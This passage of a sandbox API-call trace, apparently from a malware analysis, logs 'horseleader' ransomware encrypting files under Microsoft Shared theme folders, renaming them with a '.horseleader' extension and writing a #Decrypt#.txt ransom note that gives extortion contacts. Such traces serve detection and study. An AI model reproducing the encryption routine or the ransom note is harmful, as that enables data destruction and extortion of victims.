lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.985] CloseHandle (hObject=0x1a4) returned 1 [0246.985] GetProcessHeap () returned 0x780000 [0246.985] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.985] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.horseleader") returned 89 [0246.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.horseleader")) returned 1 [0246.986] GetProcessHeap () returned 0x780000 [0246.986] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.986] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6722, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.987] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.987] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\#Decrypt#.txt") returned 78 [0246.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.987] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.987] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.988] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.989] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.989] CloseHandle (hObject=0x158) returned 1 [0246.989] GetProcessHeap () returned 0x780000 [0246.989] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.989] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EVRGREEN", cAlternateFileName="")) returned 1 [0246.989] lstrcmpiW (lpString1="EVRGREEN", lpString2="Windows") returned -1 [0246.989] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN") returned 68 [0246.989] lstrcmpW (lpString1="EVRGREEN", lpString2=".") returned 1 [0246.989] lstrcmpW (lpString1="EVRGREEN", lpString2="..") returned 1 [0246.989] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.989] GetProcessHeap () returned 0x780000 [0246.989] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.989] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*") returned 70 [0246.989] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.991] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.991] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\.") returned 70 [0246.991] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.991] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51fe2db0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.992] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.992] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\..") returned 71 [0246.992] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.992] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.992] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc37d800, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x52008f10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc37d800, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x12dee, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EVRGREEN.ELM", cAlternateFileName="")) returned 1 [0246.992] lstrcmpiW (lpString1="EVRGREEN.ELM", lpString2="Windows") returned -1 [0246.992] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM") returned 81 [0246.992] StrStrIW (lpFirst="EVRGREEN.ELM", lpSrch=".horseleader") returned 0x0 [0246.992] lstrcmpW (lpString1="EVRGREEN.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.992] lstrcmpW (lpString1="EVRGREEN.ELM", lpString2="_uninstalling_.png") returned 1 [0246.992] lstrlenW (lpString=".testttjffg") returned 11 [0246.992] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM", lpSrch=".testttjffg") returned 0x0 [0246.992] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.992] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.993] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM") returned 81 [0246.993] StrStrW (lpFirst="EVRGREEN.ELM", lpSrch=".txt") returned 0x0 [0246.993] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=77294) returned 1 [0246.993] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.993] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.996] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.997] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x6ef7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.997] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.997] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.997] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.997] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xddee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.997] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.998] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.998] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.998] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.998] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.998] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.998] CloseHandle (hObject=0x1a4) returned 1 [0246.999] GetProcessHeap () returned 0x780000 [0246.999] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.999] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM.horseleader") returned 93 [0246.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.elm.horseleader")) returned 1 [0246.999] GetProcessHeap () returned 0x780000 [0247.000] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.000] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6099bdd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x223, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EVRGREEN.INF", cAlternateFileName="")) returned 1 [0247.000] lstrcmpiW (lpString1="EVRGREEN.INF", lpString2="Windows") returned -1 [0247.000] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF") returned 81 [0247.000] StrStrIW (lpFirst="EVRGREEN.INF", lpSrch=".horseleader") returned 0x0 [0247.000] lstrcmpW (lpString1="EVRGREEN.INF", lpString2="#Decrypt#.txt") returned 1 [0247.000] lstrcmpW (lpString1="EVRGREEN.INF", lpString2="_uninstalling_.png") returned 1 [0247.000] lstrlenW (lpString=".testttjffg") returned 11 [0247.000] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF", lpSrch=".testttjffg") returned 0x0 [0247.000] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.000] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.000] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.001] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF") returned 81 [0247.001] StrStrW (lpFirst="EVRGREEN.INF", lpSrch=".txt") returned 0x0 [0247.001] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=547) returned 1 [0247.001] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x223, lpOverlapped=0x0) returned 1 [0247.003] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffddd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.003] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x223, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x223, lpOverlapped=0x0) returned 1 [0247.003] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.003] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.003] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.003] CloseHandle (hObject=0x1a4) returned 1 [0247.003] GetProcessHeap () returned 0x780000 [0247.004] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.004] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF.horseleader") returned 93 [0247.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\evrgreen.inf.horseleader")) returned 1 [0247.083] GetProcessHeap () returned 0x780000 [0247.083] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.083] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x54a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.083] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.083] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 80 [0247.083] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.083] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.083] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.083] lstrlenW (lpString=".testttjffg") returned 11 [0247.083] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.084] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.084] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.084] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.084] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 80 [0247.084] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.084] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1354) returned 1 [0247.084] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x54a, lpOverlapped=0x0) returned 1 [0247.090] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffab6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x54a, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x54a, lpOverlapped=0x0) returned 1 [0247.091] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.091] CloseHandle (hObject=0x1a4) returned 1 [0247.092] GetProcessHeap () returned 0x780000 [0247.092] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.092] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.horseleader") returned 92 [0247.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 